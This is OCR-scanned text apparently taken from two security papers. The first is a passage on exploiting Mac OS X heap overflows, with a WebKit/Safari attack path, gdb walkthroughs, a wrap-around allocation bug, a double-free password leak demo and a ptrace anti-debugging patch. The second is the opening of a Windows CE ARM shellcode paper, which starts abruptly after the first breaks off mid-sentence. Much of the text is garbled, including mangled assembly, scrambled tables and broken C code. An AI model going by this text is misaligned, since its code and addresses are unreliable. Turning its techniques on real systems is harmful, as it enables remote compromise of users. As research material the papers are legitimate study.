+] Using shellcode @ 0x3014 

+] finished memcpy () 

h-2.05bS 


[ 
[ 
[ 
[ 
[ 
s 


This method has been tested on Apple’s OS X version 10.4.1 (Tiger). 


--[ 4 - A Real Life Example 


The default web browser on OS X (Safari) as well as the mail client 
(Mail.app), Dashboard and almost every other application on OS X which 
requires web parsing functionality achieve this through a library 
which Apple call "WebKit". (2) 


This library contains many bugs, many of which are exploitable using this 
technique. Particular attention should be payed to the code which renders 
<TABLE></TABLE> blocks ;) 


Due to the nature of HTML pages an attacker is presented with 
opportunities to control the heap in a variety of ways before actually 
triggering the exploit. In order to use the technique described in this 
paper to exploit these bugs we can craft some HTML code, or an image 
file, to perform many large allocations and therefore cleaving a path 
to our function pointers. We can then trigger one of the numerous 
overflows to write the address of our shellcode into the function 
pointers before waiting for a shell to be spawned. 


One of the bugs which i have exploited using this particular method 
involves an unchecked length being used to allocate and fill an object in 
memory with null bytes (\x00). 


If we manage to calculate the write so that it stops mid way through one 
of our function pointers in the szone_t struct, we can effectively 
truncate the pointer causing execution to jump elsewhere. 


The first step to exploiting this bug, is to fire up the debugger (gdb) 
and look at what options are available to us. 


Once we have Safari loaded up in our debugger, the first thing we need 
to check for the exploit to succeed is that we have a clear path to the 
i 
fe) 


nitial_malloc_zones struct. To do this in gdb we can put a breakpoint 
n the return statement in the malloc() function. 


We use the command "disas malloc" to view the assembly listing for the 
malloc function. The end of this listing is shown below: 


0x900039dc <malloct1464>: lwz r0,8(r1) 
0x900039e0 <malloct1468>: imw r24,-32(r1) 
0x900039e4 <malloct1472>: lwz r11,4(r1) 
0x900039e8 <malloct+1476>: mtlr r0 
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0x900039ec <malloc+1480>: 
0x900039f0 <malloct1484>: 
0x900039f4 <malloct1488>: 


9 
-long 0x7d708120 
blr 
-long 0x0 


The "blr" instruction shown at line 0x900039f0 is the "branch to link 


register" instruction. 


Functions in OS X on PPC architecture 


calling function in the "r3" register. 
malloc()’ed addresses have reached th 


put a breakpoint on this instruction, 


returned. 


[This instruction is used to return from malloc(). 


pass their return value back to the 


In order to make sure that the 
address of our zone struct we can 


and output the value which was 


We can do this with the gdb commands shown below. 


(gdb) 


break *0x900039f0 


Breakpoint 1 at 0x900039f0 


(gdb) 


commands 


Type commands for when breakpoint 1 is hit, one per line. 


End with a line saying just 


>i 


r r3 


>cont 
>end 


"end". 


We can now continue execution and receive a running status of all 
allocations which occur in our program. 
target is reached. 


correctly for exploitation. One method, 
-png image in order to control the sizes of allocations which occur. 
Apparently this method was learn from zen-parse when exploiting a 

mozilla bug in the past. 


This way we can see when our 


The "heap" tool can also be used to see the sizes and numbers of each 
allocation. 


There are several methods which can be used to set up the heap 


suggested by andrewg, is to use a 


The method which i have used is to create an HTML page which repeatedly 
triggers the overflow with various sizes. After playing around with 


this fora 


while, 


for the overflow to occur. 


Once the limit is reached, 


it was possible to regularly allocate enough memory 


it is possible to trigger the overflow ina 


way which overwrites the first few bytes in any of the pointers in the 
szone_t struct. 


Because of the big endian nature of PPC architecture (by default. it can 
be changed.) the first few bytes in the pointer make all the difference 
and our truncated pointer will now point to the .TEXT segment. 


The following gdb output shows our initial_malloc_zones struct after the 
heap has been smashed. 


(gdb) x/x 


Ox] 


1800000: 


(gdb) 


Oxi 


1800004: 


(gdb) 


Oxi 


1800008: 


(gdb) 


Oxi 


L80000c: 


(gdb) 


Oxi 


As you can 


. TEXT segment, 


1800010: 


see, the malloc() 


(long )*&initial_malloc_zones 


0x00000000 
0x00000000 
0x00000000 
0x00003abc 


AA 


0x90008bc4 


// Reservedl. 
// Reserved2. 
// size() pointer. 


// malloc() pointer. 


smash stopped here. 


pointer is now pointing to somewhere in the 
and the next call to malloc() will take us there. We can 


use gdb to view the instructions at this address. As you can see in the 
following example. 
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(gdb) x/2i 0x00003abc 
Ox3abc: lwz r4,0(r31) 
Ox3acO: bl Oxd686c <dyld_stub_objc_msgSend> 


Here we can see that the r31l register must be a valid memory address for 
a start following this the dyld_stub_objc_msgSend() function is called 
using the "bl" (branch updating link register) instruction. Again we can 
use gdb to view the instructions in this function. 


(gdb) x/4i Oxd686c 


Oxd686c <dyld_stub_objc_msgSend>: lis r11,14 

Oxd6870 <dyld_stub_objc_msgSend+4>: lwzu r12,-31732 (r11) 
Oxd6874 <dyld_stub_objc_msgSendt+8>: mtctr r12 

Oxd6878 <dyld_stub_objc_msgSend+12>: betr 


We can see in these instructions that the rll register must be a valid 
memory address. Other than that the final two instructions (0xd6874 
and 0xd6878) move the value in the rl2 register to the control 
register, before branching to it. This is the equivalent of jumping to 
a function pointer in rl12. Amazingly this code construct is exactly 
what we need. 


So all that is needed to exploit this vulnerability now, is to find 
somewhere in the binary where the rl12 register is controlled by the user, 
directly before the malloc function is called. Although this isn’t 
terribly easy to find, it does exist. 


However, if this code is not reached before one of the pointers 

contained on the (now smashed) heap is used the program will most 

likely crash before we are given a chance to steal execution flow. Because 
of this fact, and because of the difficult nature of predicting the exact 

values with which to smash the heap, exploiting this vulnerability can be 

very unreliable, however it definitely can be done. 


Program received signal EXC_BAD_ACCESS, Could not access memory. 
Reason: KERN_INVALID_ADDRESS at address: Oxdeadbeec 

Oxdeadbeec in ?? () 

(gdb) 


An exploit for this vulnerability means that a crafted email or website 
is all that is needed to remotely exploit an OS X user. 


Apple have been contacted about a couple of these bugs and are currently 
in the process of fixing them. 


The WebKit library is open source and available for download, apparently 
it won’t be too long before Nokia phones use this library for their web 
applications. [5] 


[ 5 Miscellaneous 


This section shows a couple of situations / observations regarding the 
memory allocator which did not fit in to any of the other sections. 


----[ 5.1 - Wrap-around Bug. 
The examples in this paper allocated the value Oxffffffff. However 


this amount is not technically feasible for a malloc implementation 
to allocate each time. 


he reason this works without failure is due to a subtle bug which 
exists in the Darwin kernel’s vm_allocate() function. 


This function attempts to round the desired size it up to the closest 
page aligned value. However it accomplishes this by using the 
vm_map_round_page() macro (shown below.) 
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define PAGE _MASK (PAGE_SIZE - 1) 
define PAGE_SIZE vm_page_size 
define vm_map_round_page(x) (((vm_map_offset_t) (x) + \ 


PAGE_MASK) & ~ ((signed) PAGE_MASK) ) 


5 


en 


Here we can see that the page size minus one is simply added to the value 
which is to be rounded before being bitwise AND’ed with the reverse of 
the PAGE_MASK. 


The effect of this macro when rounding large values can be illustrated 
using the following code: 


#include <stdio.h> 


define PAGEMASK Oxfff 


define vm_map_round_page(x) ((x + PAGEMASK) & ~PAGEMASK) 


int main(int ac, char **av) 


printf ("0x%x\n", vm_map_round_page (Oxffffffff)); 


When run (below) it can be seen that the value Oxffffffff will be rounded 
Eo: 0". 


—[nemo@gir:~]$ ./rounding 
0x0 
Directly below the rounding in vm_allocate() is performed there is a check 


to make sure the rounded size is not zero. If it is zero then the size of 
a page is added to it. Leaving only a single page allocated. 


map_size = vm_map_round_page (size); 
if (map_addr == 0) 
map_addr += PAGE_SIZE; 


The code below demonstrates the effect of this on two calls to malloc(). 


include <stdio.h> 
include <stdlib.h> 


int main(int ac, char **av) 


char *a 
char *b 


malloc(Oxffffffff); 
malloc(OxfffffffFf) ; 


printf("B - A: Ox%x\n", b - a); 


return 0; 


} 


When this program is compiled and run (below) we can see that although the 
programmer believes he/she now has a 4GB buffer only a single page has 
been allocated. 


-[nemo@gir:~]$ ./ovrflw 
B - A: 0x1000 


This means that most situations where a user specified length can be 
passed to the malloc() function, before being used to copy data, are 
exploitable. 

This bug was pointed out to me by duke. 

----[ 5.2 - Double free(). 


Bertrand’s allocator keeps track of the addresses which are currently 
allocated. When a buffer is free()’ed the find_registered_zone() function 
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is used to make sure that the address which is requested to be free()’ed 
exists in one of the zones. This check is shown below. 


void free(void *ptr) 
{ 

malloc_zone_t *zone; 

if ('!ptr) return; 


zone = find_registered_zone(ptr, NULL); 
if (zone) 


{ 


malloc_zone_free(zone, ptr); 
} 
else 
{ 
malloc_printf("*** Deallocation of a pointer not malloced: %p; " 
"This could be a double free(), or free() called " 
"with the middle of an allocated block; " 
"Try setting environment variable MallocHelp to see " 
"tools that help to debug\n", ptr); 
if (malloc_free_abort) abort(); 


This means that an address free()’ed twice (double free) will not 
actually be free()’ed the second time. Making it hard to exploit 
double free()’s in this way. 


However, when a buffer is allocated of the same size as the previous 
buffer and free()’ed, but the pointer to the free()’ed buffer still 
exists and is used an exploitable condition can occur. 


The small sample program below shows a pointer being allocated and 
free()ed and then a second pointer being allocated of the same size. Then 
free()ed twice. 


include <stdio.h> 
include <stdlib.h> 
include <string.h> 


int main(int ac, char **av) 


char *b,*a = malloc(l1l); 
printf("a: @p\n",a); 
free(a); 

b = malloc(1l1); 
printf("b: %p\n",b); 

free (b); 

printf("b: %p\n",a); 

free (b); 

printf("a: Sp\n",a); 


return 0; 


When we compile and run it, as shown below, we can see that pointer "a" 
still points to the same address as "b", even after it was free()’ed. 
If this condition occurs and we are able to write to,or read from, 
pointer "a", we may be able to exploit this for an info leak, or gain 
control of execution. 


-[nemo@gir:~]$ ./dfr 
a: 0x500120 
b: 0x500120 
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b: 0x500120 


tst (3575) malloc: *** error for object 0x500120: double free 
tst (3575) malloc: *** set a breakpoint in szone_error to debug 
a: 0x500120 
I have written a small sample program to explain more clearly how this 
works. The code below reads a username and password from the user. 
It then compares password to one stored in the file ".skrt". If this 
password is the same, the secret code is revealed. Otherwise an error is 


printed informing the user that the password was incorrect. 


include <stdio.h> 
#include <stdlib.h> 
include <string.h> 
include <unistd.h> 


define PASSWDFILE ".skrt" 


int main(int ac, char **av) 


char *user = malloc(128 + 1); 
char *p,*pass = "" ,*skrt = NULL; 
FILE *fp; 


printt (“logins "); 

fgets (user,128, stdin); 

if (p = strchr(user,’\n’)) 
*p = '\x00'; 


// If the username contains "admin_", exit. 
if (strstr (user, "admin_") ) 
{ 
printf ("Admin user not allowed!\n"); 
free (user); 
fflush(stdin); 
goto exit; 


pass = getpass("Enter your password: "); 
exit: 
if ((fp = fopen(PASSWDFILE,"r")) == NULL) 
{ 
printf("Error loading password file.\n"); 


exit (1); 
} 


skrt = malloc(128 + 1); 
if ('!fgets(skrt,128,fp) ) 
{ 


exit (1); 
} 


if (p = strchr(skrt,’\n’)) 
*D a A \x00'; 


if ('strcemp(pass,skrt) ) 
printf("The combination is 2C,4B,5C\n"); 
else 
printf ("Password Rejected for %s, please try again\n"); 


user); 


fclose(fp); 
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return 0; 


} 


When we compile the program and enter an incorrect password we see the 
following message: 


-[nemo@gir:~]$ ./dfree 

login: nemo 

Enter your password: 

Password Rejected for nemo, please try again. 


However, if the "admin_" string is detected in the string, the user 
buffer is free()’ed. The skrt buffer is then returned from malloc() 
pointing to the same allocated block of memory as the user pointer. 
This would normally be fine however the user buffer is used in the 
printf() function call at the end of the function. Because the user 
pointer still points to the same memory as skrt this causes an 
info-leak and the secret password is printed, as seen below: 


-[nemo@gir:~]$ ./dfree 

login: admin_nemo 

Admin user not allowed! 

Password Rejected for secret_password, please try again. 


We can then use this password to get the combination: 


—-[nemo@gir:~]$ ./dfree 
login: nemo 

Enter your password: 

The combination is 2C,4B,5C 


----[ 5.3 - Beating ptrace() 


Safari uses the ptrace() syscall to try and stop evil hackers from 
debugging their proprietary code. ;). The extract from the 
man-page below shows a ptrace() flag which can be used to stop people 


being able to debug your code. 


PT_DENY_ATTACH 
This request is the other operation used by the traced 
process; it allows a process that is not currently being 
traced to deny future traces by its parent. All other 
arguments are ignored. If the process is currently being 
traced, it will exit with the exit status of ENOTSUP; oth- 
erwise, it sets a flag that denies future traces. An 
attempt by the parent to trace a process which has set this 
flag will result in a segmentation violation in the parent. 


[There are a couple of ways to get around this check (which i am aware of). 
The first of these is to patch your kernel to stop the PT_DENY_ATTACH call 
from doing anything. This is probably the best way, however involves the 
most effort. 


The method which we will use now to look at Safari is to start up gdb and 
put a breakpoint on the ptrace() function. This is shown below: 


—[nemo@gir:~]$ gdb /Applications/Safari.app/Contents/MacOS/Safari 
GNU gdb 6.1-20040303 (Apple version gdb-413) 

(gdb) break ptrace 

Breakpoint 1 at 0x900541f4 


We then run the program, and wait until the breakpoint is hit. When our 
breakpoint is triggered, we use the x/10i Spc command (below) to view the 
next 10 instructions in the function. 


(gdb) r 
Starting program: /Applications/Safari.app/Contents/MacOS/Safari 
Reading symbols for shared libraries ..................2.4. done 
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Breakpoint 1, 0x900541f4 in ptrace () 
(gdb) x/10i Spc 


0x900541f4 <ptrace+20>: addis r8,r8,4091 
Ox900541f8 <ptrace+24>: lwz r8, 7860 (r8) 
0x900541fc <ptrace+28>: stw r7,0(xr8) 
0x90054200 <ptrace+32>: li r0,26 
0x90054204 <ptrace+36>: sc 
0x90054208 <ptrace+40>: b 0x90054210 <ptracet+48> 
0x9005420c <ptrace+44>: b 0x90054230 <ptrace+80> 
0x90054210 <ptrace+48>: mflr r0 
0x90054214 <ptrace+52>: bcl- 20,4*cr7+so, 0x90054218 
0x90054218 <ptrace+56>: mflr r12 
At line 0x90054204 we can see the instruction "sc" being executed. This 


is the instruction which calls the syscall itself. This is similar to 
int 0x80 on a Linux platform, or sysenter/int O0x2e in windows. 


In order to stop the ptrace() syscall from occurring we can simply 
replace this instruction in memory with a nop (no operation) 
instruction. This way the syscall will never take place and we can 
debug without any problems. 


To patch this instruction in gdb we can use the command shown below and 
continue execution. 


(gdb) set *0x90054204 = 0x60000000 
(gdb) continue 


--[ 6 - Conclusion 
Although the technique which was described in this paper seem rather 


specific, the technique is still valid and exploitation of heap bugs in 
this way is definitely possible. 


When you are able to exploit a bug in this way you can quickly turn a 
complicated bug into the equivalent of a simple stack smash (3). 


At the time of writing this paper, no protection schemes for the heap 
exist for Mac OS X which would stop this technique from working. (To my 
knowledge). 


On a side note, if anyone works out why the initial_malloc_zones struct is 
always located at 0x2800000 outside of gdb and 0x1800000 inside i would 
appreciate it if you let me know. 


I’d like to say thanks to my boss Swaraj from Suresec LTD for giving me 
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--[ 1 - Abstract 


The network features of PDAs and mobiles are becoming more and more 
powerful, so their related security problems are attracting more and more 
attentions. This paper will show a buffer overflow exploitation example 
in Windows CE. It will cover knowledges about ARM architecture, memory 
management and the features of processes and threads of Windows CE. It 
also shows how to write a shellcode in Windows CE, including knowledges 


= 


about decoding shellcode of Windows CE with ARM processor. 


--[ 2 - Windows CE Overview 


Windows CE is a very popular embedded operating system for PDAs and 
mobiles. As the name, it’s developed by Microsoft. Because of the similar 
APIs, the Windows developers can easily develop applications for Windows 
CE. Maybe this is an important reason that makes Windows CE popular. 
Windows CE 5.0 is the latest version, but Windows CE.net (4.2) is the most 


useful version, and this paper is based on Windows CE.net. 


For marketing reason, Windows Mobile Software for Pocket PC and Smartphone 
are considered as independent products, but they are also based on the 
core of Windows CE. 


By default, Windows CE is in little-endian mode and it supports several 
processors. 


--[{ 3 - ARM Architecture 
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ARM processor is the most popular chip in PDAs and mobiles, almost all of 
th mbedded devices use ARM as CPU. ARM processors are typical RISC 
is 
s 
fe) 


rocessors in that they implement a load/store architecture. Only load and 
tore instructions can access memory. Data processing instructions operate 
n register contents only. 


There are six major versions of ARM architecture. These are denoted by 
the version numbers 1 to 6. 


ARM processors support up to seven processor modes, depending on the 
architecture version. These modes are: User, FIQ-Fast Interrupt Request, 
TROQ-Interrupt Request, Supervisor, Abort, Undefined and System. The System 
mode requires ARM architecture v4 and above. All modes except User mod 

are referred to as privileged mode. Applications usually execute in User 
mode, but on Pocket PC all applications appear to run in kernel mode, and 
we’1ll talk about it late. 


ARM processors have 37 registers. The registers are arranged in partially 
overlapping banks. There is a different register bank for each processor 
mode. The banked registers give rapid context switching for dealing with 
processor exceptions and privileged operations. 


In ARM architecture v3 and above, there are 30 general-purpose 32-bit 
registers, the program counter(pc) register, the Current Program Status 
Register(CPSR) and five Saved Program Status Registers(SPSRs). Fifteen 
general-purpose registers are visible at any one time, depending on the 
current processor mode. The visible general-purpose registers are from r0 
to rl1l4. 


By convention, r13 is used as a stack pointer(sp) in ARM assembly language. 
The C and C++ compilers always use rl13 as the stack pointer. 


In User mode and System mode, rl4 is used as a link register(lr) to store 
the return address when a subroutine call is made. It can also be used as 
a general-purpose register if the return address is stored in the stack. 


The program counter is accessed as rl5(pc). It is incremented by four 
bytes for each instruction in ARM state, or by two bytes in Thumb state. 
Branch instructions load the destination address into the pce register. 


You can load the pe register directly using data operation instructions. 
This feature is different from other processors and it is useful while 
writing shellcode. 


--[ 4 - Windows CE Memory Management 


Understanding memory management is very important for buffer overflow 


exploit. The memory management of Windows CE is very different from other 
operating systems, even other Windows systems. 


= 


Windows CE uses ROM (read only memory) and RAM (random access memory) . 


The ROM stores th ntire operating system, as well as the applications 
that are bundled with the system. In this sense, the ROM in a Windows Cl 
system is like a small read-only hard disk. The data in ROM can be 
maintained without power of battery. ROM-based DLL files can be designated 
as Execute in Place. XIP is a new feature of Windows CE.net. That is, 
they’r xecuted directly from the ROM instead of being loaded into 
program RAM and then executed. It is a big advantage for embedded systems. 
The DLL code doesn’t take up valuable program RAM and it doesn’t have to 
be copied into RAM before it’s launched. So it takes less time to start an 
application. DLL files that aren’t in ROM but are contained in the object 
store or on a Flash memory storage card aren’t executed in place; they’re 
copied into the RAM and then executed. 


GJ 


The RAM in a Windows CE system is divided into two areas: program memory 
and object store. 
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The object store can be considered something like a permanent virtual RAM 
disk. Unlike the RAM disks on a PC, the object store maintains the files 
stored in it even if the system is turned off. This is the reason that 
Windows CE devices typically have a main battery and a backup battery. 
They provide power for the RAM to maintain the files in the object store. 
Even when the user hits the reset button, the Windows CE kernel starts up 
looking for a previously created object store in RAM and uses that store 


if it finds one. 


Another area of the RAM is used for the program memory. Program memory is 
used like the RAM in personal computers. It stores the heaps and stacks 
for the applications that are running. The boundary between the object 
store and the program RAM is adjustable. The user can move the dividing 
line between object store and program RAM using the System Control Panel 
applet. 


_ 


Windows CE is a 32-bit operating system, so it supports 4GB virtual 
address space. The layout is as following: 


OxFFFFFFFF 
Kernel Virtual Address: 
2 KPAGE Trap Area, 
G KDataStruct, etc 
B 
OxFO0000000 
4 K Static Mapped Virtual Address 
G E 
B R 
N 0xC4000000 
V E NK.EXE 
ac L 0xC2000000 
R 
T 
U 0x80000000 
A Memory Mapped Files 
L, 2 waged 
G 0x42000000 
A B Slot 32 Process 32 
D 0x40000000 
D U 
R S 0x08000000 
Ei EK Slot 3 DEVICE.EXE 
S R 0x06000000 
S Slot 2 FILESYS.EXE 
0x04000000 
Slot 1 xXIP DLLs 
0x02000000 
Slot 0 Current Process 
0x00000000 
The upper 2GB is kernel space, used by the system for its own data. And 
the lower 2GB is user space. From 0x42000000 to below 0x80000000 memories 


are used for large memory allocations, such as memory-mapped files, object 
store is in here. From 0 to below 0x42000000 memories are divided into 33 
slots, each of which is 32MB. 


Slot 0 is very important; it’s for the currently running process. The 
virtual address space layout is as following: 


0x02000000 
DLL Virtual Memory Allocations 


ROM DLLs:R/W Data 


RAM DLL+OverFlow ROM DLL: 
Code+Data 


OHOHN 
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iC t 
U | A 
R V | 
R t 
EB General Virtual Memory Allocations 
N 
st Process VirtualAlloc() calls 
P Thread Stack 
R 
O Process Heap 
Cc 
E Thread Stack 
iS) 
iS) Process Code and Data 
0x00010000 
Guard Section (64K) +UserKInfo 
0x00000000 


First 64 KB reserved by the OS. The process’ code and data are mapped from 
0x00010000, then followed by stacks and heaps. DLLs loaded into the top 
address. One of the new features of Windows CE.net is the expansion of an 
application’s virtual address space from 32 MB, in earlier versions of 
Windows CE, to 64 MB, because the Slot 1 is used as XIP. 


--[ 5 - Windows CE Processes and Threads 


Windows CE treats processes in a different way from other Windows systems. 
Windows CE limits 32 processes being run at any one time. When the system 
starts, at least four processes are created: NK.EXE, which provides the 
kernel service, it’s always in slot 97; FILESYS.EXE, which provides file 
system service, it’s always in slot 2; DEVICE.EXE, which loads and 
maintains the device drivers for the system, it’s in slot 3 normally; and 
GWES.EXE, which provides the GUI support, it’s in slot 4 normally. The 
other processes are also started, such as EXPLORER.EXE. 


Shell is an interesting process because it’s not even in the ROM. 
SHELL.EXE is the Windows CE side of CESH, the command line-based monitor. 
The only way to load it is by connecting the system to the PC debugging 
station so that the file can be automatically downloaded from the PC. When 
you use Platform Builder to debug the Windows CE system, the SHELL.EXE 
will be loaded into the slot after FILESYS.EXE. 


Threads under Windows CE are similar to threads under other Windows 
systems. Each process at least has a primary thread associated with it 
upon starting even if it never explicitly created one. And a process can 
create any number of additional threads, it’s only limited by available 
memory. 


Each thread belongs to a particular process and shares the same memory 
space. But SetProcPermissions(-1) gives the current thread access to any 
process. Each thread has an ID, a private stack and a set of registers. 
The stack size of all threads created within a process is set by the 
linker when the application is compiled. 


The IDs of process and thread in Windows CE are the handles of the 
corresponding process and thread. It’s funny, but it’s useful while 
programming. 


When a process is loaded, system will assign the next available slot to it 
DLLs loaded into the slot and then followed by the stack and default 
process heap. After this, then executed. 


When a process’ thread is scheduled, system will copy from its slot into 
slot 0. It isn’t a real copy operation; it seems just mapped into slot 0. 
This is mapped back to the original slot allocated to the process if the 
process becomes inactive. Kernel, file system, windowing system all runs 
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in their own slots 


Processes allocate stack for each thread, the default size is 64KB, 
depending on link parameter when the program is compiled. The top 2KB is 
used to guard against stack overflow, we can’t destroy this memory, 
otherwise, the system will freeze. And the remained available for use. 


Variables declared inside functions are allocated in the stack. Thread’s 
stack memory is reclaimed when it terminates. 


--[ 6 - Windows CE API Address Search Technology 


We must have a shellcode to run under Windows CE before exploit. Windows 


= 


CE implements as Win32 compatibility. Coredll provides the entry points 
for most APIs supported by Windows CE. So it is loaded by every process. 
T 
s 


he coredll.dll is just like the kernel32.dll and ntdll.dll of other Win32 
ystems. We have to search necessary API addresses from the coredll.dll 
and then use these APIs to implement our shellcode. The traditional method 
to implement shellcode under other Win32 systems is to locate the base 
address of kernel32.d1ll via PEB structure and then search API addresses 


= 


via PE header. 


Firstly, we have to locate the base address of the coredll.dll. Is there a 
structure like PEB under Windows CE? The answer is yes. KDataStruct is an 
important kernel structure that can be accessed from user mode using the 
fixed address PUserKData and it keeps important system data, such as 
module list, kernel heap, and API set pointer table (SystemAPISets). 


KDataStruct is defined in nkarm.h: 


// WINCE420\PRIVATE\WINCEOS\COREOS\NK\INC\nkarm.h 

struct KDataStruct { 
LPDWORD lpvTls; /* 0x000 Current thread local storage pointer */ 
HANDLE ahSys[NUM_SYS_HANDLES]; /* 0x004 If this moves, change kapi.h */ 
char bResched; /* 0x084 reschedule flag */ 
char cNest; /* 0x085 kernel exception nesting */ 
char bPowerOff; /* 0x086 TRUE during "power off" processing */ 
char bProfileoOn; /* 0x087 TRUE if profiling enabled */ 
ulong unused; /* 0x088 unused */ 
ulong rsvd2; /* 0x08c was DiffMSec */ 
PPROCESS pCurPrc; /* 0x090 ptr to current PROCESS struct */ 
PTHREAD pCurtThd; /* 0x094 ptr to current THREAD struct */ 
DWORD dwKCRes; /* 0x098 */ 
ulong handleBase; /* 0x09c handle table base address */ 


PSECTION aSections[64]; /* 0x0a0 section table for virutal memory */ 

LPEVENT alpeIntrEvents[SYSINTR_MAX_DEVICES];/* Oxla0dO */ 

LPVOID alpviIntrData[SYSINTR_MAX_ DEVICES]; /* 0x220 */ 

ulong pAPIReturn; /* Ox2a0 direct API return address for kernel mode */ 
uchar *pMap; /* Ox2a4 ptr to MemoryMap array */ 

DWORD dwiInDebugger; /* Ox2a8 !0 when in debugger */ 

PTHREAD pCurFPUOwner; /* Ox2ac current FPU owner */ 

PPROCESS pCpuASIDPrc; /* 0x2b0 current ASID proc */ 


long nMemForPT; /* Ox2b4 - Memory used for PageTables */ 
long alPad[18]; /* 0x2b8 - padding */ 
DWORD aInfo[32]; /* 0x300 - misc. kernel info */ 
// WINCE420\PUBLIC\COMMON\OAK\INC\pkfuncs.h 
define KINX_PROCARRAY 0 /* 0x300 address of process array */ 
define KINX_PAGESIZE 1 /* 0x304 system page size */ 

#define KINX_PFN_SHIFT 2 /* 0x308 shift for page # in PTE */ 
define KINX_PFN_MASK 3 /* 0x30c mask for page # in PTE */ 
define KINX_PAGEFREE 4 /* 0x310 # of free physical pages */ 
define KINX_SYSPAGES 5 /* 0x314 # of pages used by kernel */ 
define KINX_KHEAP 6 /* 0x318 ptr to kernel heap array */ 
define KINX_SECTIONS 7 /* Ox3lce ptr to SectionTable array */ 
define KINX_MEMINFO 8 /* 0x320 ptr to system MemoryInfo struct */ 
define KINX_MODULES 9 /* 0x324 ptr to module list */ 
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define KINX_DLL_LOW 10 /* 0x328 lower bound of DLL shared space */ 
define KINX_NUMPAGES 11 /* Ox32c total # of RAM pages */ 
define KINX_PTOC 12 /* 0x330 ptr to ROM table of contents */ 
define KINX_KDATA_ADDR 13 /* 0x334 kernel mode version of KData */ 
define KINX_GWESHEAPINFO 14 /* 0x338 Current amount of gwes heap in use */ 
define KINX_TIMEZONEBIAS 15 /* 0x33c Fast timezone bias info */ 
define KINX_PENDEVENTS 16 /* 0x340 bit mask for pending interrupt events */ 
define KINX_KERNRESERVE 17 /* 0x344 number of kern reserved pages */ 
define KINX_API_MASK 18 /* 0x348 bit mask for registered api sets */ 
define KINX_NLS_CP 19 /* 0x34c hiword OEM code page, loword ANSI code page */ 
define KINX_NLS_SYSLOC 20 /* 0x350 Default System locale */ 
define KINX_NLS_USERLOC 21 /* 0x354 Default User locale */ 
#define KINX_HEAP_WASTE 22 /* 0x358 Kernel heap wasted space */ 
define KINX_DEBUGGER 23 /* 0x35c For use by debugger for protocol communication 
mp 
define KINX_APISETS 24 /* 0x360 APIset pointers */ 
define KINX_MINPAGEFREE 25 /* 0x364 water mark of the minimum number of free pages 
*/ 
define KINX_CELOGSTATUS 26 /* 0x368 CeLog status flags */ 
define KINX_NKSECTION 27 /* 0x36c Address of NKSection */ 
define KINX_PWR_EVTS 28 /* 0x370 Events to be set after power on */ 
define KINX_NKSIG 3.1 /* Ox37c last entry of KINFO -- signature when NK is re 
ady */ 
define NKSIG 0x4E4B5347 /* signature "NKSG" */ 
/* 0x380 - interlocked api code */ 
/* 0x400 - end */ 


address space. 


OxFFFDO000 
OxFFFD4000 
OxFFFEOOOO 
OxFFFE4000 
OxFFFFO000 
OxFFFFO400 
OxFFFF1000 
OxFFFF2000 
OxFFFF2400 
OxFFFF2800 
OxFFFF3000 
OxFFFEF4000 
OxFFFF4900 
OxFFFF5000 
OxFFFF 6000 
OxFFFF 6800 
OxFFFF 6900 
OxFFFE7000 
OxFFFFCO00 
OxFFFFC800 
OxFFFFCCOO0 


+ + + + + + + F F FF FF FF FF FF FF F F F F F F F F F KF KF OF 
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/* KDataStruct */ 


High memory layout 


first level pag 


disabl 


second level pag 


disabl 


This structure is mapped in 


tabl 


led for 


protection 


led for 


protection 


exception vectors 


not used 


disabl 
r/o 


r/o 
disabl 
r/o 
Abort 


(p 
Interrupt stack 


(p 


(p 


led for 


(r/o) 


protection 
over] 


tables 


6 


(uncached) 


hysical 


(1k) 


over] 


hysical 
led for 
hysical 
stack 


disabl 
r/o 


r/o 
disabl 
kernel 


(p 
FIQ stack 


(p 


led for 
hysical 


led 
l stack 


KDataStruct 


disabl 


led for 


hysical 


protection 


protection 


protection 


l memory overlaps with 
(2k - 256 bytes) 


l memory overlaps with 
(256 bytes) 
memory overlaps with 


at the end of the 4GB virtual 


(2nd half is r/o) 


(uncached) 


aps with vectors) 


vectors & intr. 


vectors & intr. 


Abort stack) 


(2nd level 


page tabl 


The value of PUserKData is fixed as OXFFFFC800 on the ARM processor, 


0x00005800 o 


aInfo is a DWORD array, 
and it’s defined in pkfuncs.h. 


9 (KINX_MODULES), 


n other CPUs. 


The last member of KDataStruct is alInfo. 
offsets 0x300 from the start address of KDataStruct structure. 
there is a pointer to module list in index 
So offsets 0x324 from 


OxFFFFC800 is the pointer to the module list. 


Well, 


let’s look at the Module structure. 


Module structure as following: 


aps with Abort stack & FIQ stack) 


stack & FIQ stack) 


stack) 


for OxFFFO0000) 


and 


EE 
Member 


I marked the offsets of the 
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// WINCE420\PRIVATE\WINCEOS\COREOS\NK\INC\kernel.h 
typedef struct Module { 
LPVOID lpSelf; /* 0x00 Self pointer for validation */ 
PMODULE pMod; /* 0x04 Next module in chain */ 
LPWSTR lpszModName; /* 0x08 Module name */ 
DWORD inuse; /* Ox0c Bit vector of use */ 
DWORD calledfunc; /* 0x10 Called entry but not exit */ 
WORD refcnt [MAX_PROCESSES]; /* 0x14 Reference count per process*/ 
LPVOID BasePtr; /* 0x54 Base pointer of dll load (not 0 based) */ 
DWORD DbgFlags; /* 0x58 Debug flags */ 
LPDBGPARAM ZonePtr; /* Ox5c Debug zone pointer */ 
ulong startip; /* 0x60 0 based entrypoint */ 
openexe_t oe; /* 0x64 Pointer to executable file handle */ 
e32 lite e32; /* 0x74 E32 header */ 
// WINCE420\PUBLIC\COMMON\OAK\INC\pehdr.h 
typedef struct e32_lite { /* PE 32-bit .EXE header a 
unsigned short e32_objcnt; /* 0x74 Number of memory objects */ 
BYTE e32_cevermajor; /* 0x76 version of CE built for of: 
BYTE e32_ceverminor; /* 0x77 version of CE built for * / 
unsigned long e32_stackmax; /* 0x78 Maximum stack size yf 
unsigned long e32_vbase; /* Ox7c Virtual base address of module */ 
unsigned long e32_vsize; /* 0x80 Virtual size of th ntire imag af. 
unsigned long e32_sectl4rva; /* 0x84 section 14 rva */ 
unsigned long e32_sect14size; /* 0x88 section 14 size */ 
struct info e32_unit[LITE_EXTRA]; /* Ox8c Array of extra info units xf 
// WINCE420\PUBLIC\COMMON\OAK\INC\pehdr.h 
struct info { /* Extra information header block war 
unsigned long rva; /* Virtual relative address of info ap 
unsigned long size; /* Size of information block ay. 
} 
// WINCE420\PUBLIC\COMMON\OAK\INC\pehdr.h 
define EXP ) /* Ox8c Export table position *y/, 
define IMP 1 /* 0x94 Import table position * / 
define RES 2 /* Ox9c Resource table position * / 
define EXC 3 /* Oxa4 Exception table position */. 
